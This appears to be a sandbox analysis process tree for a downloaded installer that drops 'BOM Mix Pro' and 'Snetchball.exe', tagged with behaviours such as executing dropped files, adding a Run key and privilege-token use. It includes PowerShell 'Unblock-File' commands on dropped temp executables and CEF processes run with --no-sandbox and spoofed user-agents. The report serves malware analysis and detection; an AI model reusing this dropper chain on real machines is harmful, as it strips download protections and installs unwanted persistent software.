C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,11421756230785192901,8918884678569281129,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4100 /prefetch:12⤵PID:968
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,11421756230785192901,8918884678569281129,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4056 /prefetch:12⤵PID:796
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,11421756230785192901,8918884678569281129,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5424 /prefetch:12⤵PID:4484
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1892,11421756230785192901,8918884678569281129,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5600 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4400
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1892,11421756230785192901,8918884678569281129,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4044 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1524
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,11421756230785192901,8918884678569281129,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5788 /prefetch:12⤵PID:4996
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,11421756230785192901,8918884678569281129,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5844 /prefetch:12⤵PID:3740
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,11421756230785192901,8918884678569281129,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3892 /prefetch:12⤵PID:4148
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,11421756230785192901,8918884678569281129,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5664 /prefetch:12⤵PID:3444
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1892,11421756230785192901,8918884678569281129,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5644 /prefetch:82⤵PID:5036
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,11421756230785192901,8918884678569281129,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1280 /prefetch:12⤵PID:1648
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,11421756230785192901,8918884678569281129,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6668 /prefetch:12⤵PID:1376
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,11421756230785192901,8918884678569281129,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6328 /prefetch:12⤵PID:3700
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1892,11421756230785192901,8918884678569281129,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6756 /prefetch:82⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:1044
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2080
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4116
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1228
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:400
-
C:\Users\Admin\Downloads\the-longing-codex_Dc3biRCmpz\the-longing-codex_Dc3biRCmpz.exe"C:\Users\Admin\Downloads\the-longing-codex_Dc3biRCmpz\the-longing-codex_Dc3biRCmpz.exe"1⤵PID:896
-
C:\Users\Admin\AppData\Local\Temp\is-REFNL.tmp\is-N2EH9.tmp"C:\Users\Admin\AppData\Local\Temp\is-REFNL.tmp\is-N2EH9.tmp" /SL4 $C005C "C:\Users\Admin\Downloads\the-longing-codex_Dc3biRCmpz\the-longing-codex_Dc3biRCmpz.exe" 6641876 522242⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2336 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /F /TN "bom_mix_pro_11151"3⤵PID:3600
-
-
C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe"C:\Users\Admin\AppData\Local\BOM Mix Pro 2.0.5.4\bommixpro.exe" 4fecda2203fc69f059d80fe67d1b6add3⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:1460 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 8524⤵
- Program crash
PID:2628
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 8604⤵
- Program crash
PID:2080
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 8924⤵
- Program crash
PID:3860
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 10644⤵
- Program crash
PID:2560
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 10844⤵
- Program crash
PID:1040
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 10564⤵
- Program crash
PID:4372
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 11244⤵
- Program crash
PID:2808
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 11524⤵
- Program crash
PID:1172
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 11324⤵
- Program crash
PID:1232
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 11164⤵
- Program crash
PID:2672
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 8884⤵
- Program crash
PID:4616
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 15804⤵
- Program crash
PID:2148
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 11084⤵
- Program crash
PID:888
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 13364⤵
- Program crash
PID:4776
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 16964⤵
- Program crash
PID:2076
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 12444⤵
- Program crash
PID:3416
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 19204⤵
- Program crash
PID:3612
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 18884⤵
- Program crash
PID:4896
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 19004⤵
- Program crash
PID:2752
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 13564⤵
- Program crash
PID:2676
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 20084⤵
- Program crash
PID:4176
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 19164⤵
- Program crash
PID:4680
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 8964⤵
- Program crash
PID:768
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 18404⤵
- Program crash
PID:3564
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 11084⤵
- Program crash
PID:2640
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 20644⤵
- Program crash
PID:4784
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 20844⤵
- Program crash
PID:2656
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 16444⤵
- Program crash
PID:2152
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 20924⤵
- Program crash
PID:3940
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 20724⤵
- Program crash
PID:2072
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 20964⤵
- Program crash
PID:1404
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 21524⤵
- Program crash
PID:2412
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 21324⤵
- Program crash
PID:908
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 21124⤵
- Program crash
PID:4644
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 21484⤵
- Program crash
PID:3324
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\tFkRz28C\GtBtte.exe"4⤵PID:1112
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\tFkRz28C\GtBtte.exe"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1172
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\8LFrg6Ok\Izaw0OcctowNceUeU.exe"4⤵
- System Location Discovery: System Language Discovery
PID:5108 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\8LFrg6Ok\Izaw0OcctowNceUeU.exe"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4216
-
-
-
C:\Users\Admin\AppData\Local\Temp\tFkRz28C\GtBtte.exeC:\Users\Admin\AppData\Local\Temp\tFkRz28C\GtBtte.exe /sid=3 /pid=2244⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:3120 -
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
PID:4876 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exeC:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- Modifies Control Panel
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:424 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 13; Mobile; rv:132.0) Gecko/132.0 Firefox/132.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2844 --field-trial-handle=2848,i,2714686665091331056,13396183525169070946,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:27⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:4372
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 13; Mobile; rv:132.0) Gecko/132.0 Firefox/132.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2980 --field-trial-handle=2848,i,2714686665091331056,13396183525169070946,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:87⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2752
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 13; Mobile; rv:132.0) Gecko/132.0 Firefox/132.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2984 --field-trial-handle=2848,i,2714686665091331056,13396183525169070946,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:87⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1560
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 13; Mobile; rv:132.0) Gecko/132.0 Firefox/132.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3156 --field-trial-handle=2848,i,2714686665091331056,13396183525169070946,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:17⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2848 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"8⤵
- Executes dropped EXE
- Drops file in Windows directory
- Modifies Control Panel
- Suspicious behavior: EnumeratesProcesses
PID:4860 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 12; A101OP) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.196 Mobile Safari/537.36 OPR/76.2.4027.73374" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2784 --field-trial-handle=2788,i,12718386901068405567,7117116320138478672,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:29⤵
- Executes dropped EXE
PID:4732
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 12; A101OP) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.196 Mobile Safari/537.36 OPR/76.2.4027.73374" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2920 --field-trial-handle=2788,i,12718386901068405567,7117116320138478672,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:89⤵
- Executes dropped EXE
PID:4544
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 12; A101OP) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.196 Mobile Safari/537.36 OPR/76.2.4027.73374" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2948 --field-trial-handle=2788,i,12718386901068405567,7117116320138478672,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:89⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5528
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 12; A101OP) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.196 Mobile Safari/537.36 OPR/76.2.4027.73374" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3124 --field-trial-handle=2788,i,12718386901068405567,7117116320138478672,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵
- Executes dropped EXE
PID:5692
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 12; A101OP) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.196 Mobile Safari/537.36 OPR/76.2.4027.73374" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3128 --field-trial-handle=2788,i,12718386901068405567,7117116320138478672,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:19⤵
- Executes dropped EXE
PID:444 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"10⤵
- Executes dropped EXE
- Modifies Control Panel
PID:5548 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"11⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies Control Panel
PID:4220 -
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; SM-G970F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.144 Mobile Safari/537.36 OPR/76.2.4027.73374" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2812 --field-trial-handle=2816,i,887523644323439315,14936490487706116949,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:212⤵
- Executes dropped EXE
PID:5348
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; SM-G970F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.144 Mobile Safari/537.36 OPR/76.2.4027.73374" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3112 --field-trial-handle=2816,i,887523644323439315,14936490487706116949,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:812⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5160
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; SM-G970F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.144 Mobile Safari/537.36 OPR/76.2.4027.73374" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3116 --field-trial-handle=2816,i,887523644323439315,14936490487706116949,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:812⤵
- Executes dropped EXE
PID:1628
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; SM-G970F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.144 Mobile Safari/537.36 OPR/76.2.4027.73374" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3136 --field-trial-handle=2816,i,887523644323439315,14936490487706116949,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:112⤵
- Executes dropped EXE
PID:764
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; SM-G970F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.144 Mobile Safari/537.36 OPR/76.2.4027.73374" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3140 --field-trial-handle=2816,i,887523644323439315,14936490487706116949,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:112⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5848
-
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; SM-G970F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.144 Mobile Safari/537.36 OPR/76.2.4027.73374" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4052 --field-trial-handle=2816,i,887523644323439315,14936490487706116949,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:112⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4888
-
-
